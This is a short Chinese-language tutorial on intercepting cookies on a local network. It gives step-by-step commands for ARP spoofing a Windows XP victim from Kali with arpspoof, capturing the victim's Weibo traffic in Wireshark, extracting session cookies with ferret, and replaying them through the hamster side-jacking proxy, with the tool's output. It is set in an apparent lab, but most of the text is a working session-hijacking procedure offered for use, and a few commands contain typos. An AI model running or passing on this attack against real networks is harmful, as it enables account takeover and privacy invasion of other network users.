内网称霸之Cookie截取
准备工具
1、一台KALI_LINUX系统
2、一台被攻击的windows系统
网络环境
Kali系统IP 10.10.10.131
Windows xp IP 10.10.10.129
使用的工具
arpspoof -->欺骗工具
wireshark -->抓包工具
开始执行步骤
1、root@kali:~# echo "1" > /proc/sys/net/ipv4/ip_forward
2、arpspoof -i eth0 -t 10.10.10.2 10.10.10.129
3、使用wireshark进行抓包
4、受害者10.10.10.129打开微博
5、停止抓包工具并保存抓包数据为pcap格式,保存名字为cookie
6、使用 ferret工具
如果没有这个工具请使用命令
ferret没有64位的
可以安装32位的
1)添加对32位的支持
dpkg --add-architecture i386
2)更新
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
3)安装ferret
sudo aptitude install ferret-sidejack:i386
4)ferrer -r cookie.pacp
7、生成hamster.txt文件,进行架设代理服务器
root@kali:~# hamster
--- HAMPSTER 2.0 side-jacking tool ---
Set browser to use proxy http://127.0.0.1:1234
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on 127.0.0.1:1234
begining thread
8、打开10.10.10.131系统中的游览器,设置代理服务地址和端口并关闭arp欺骗
9、分析hamster信息一条一条进行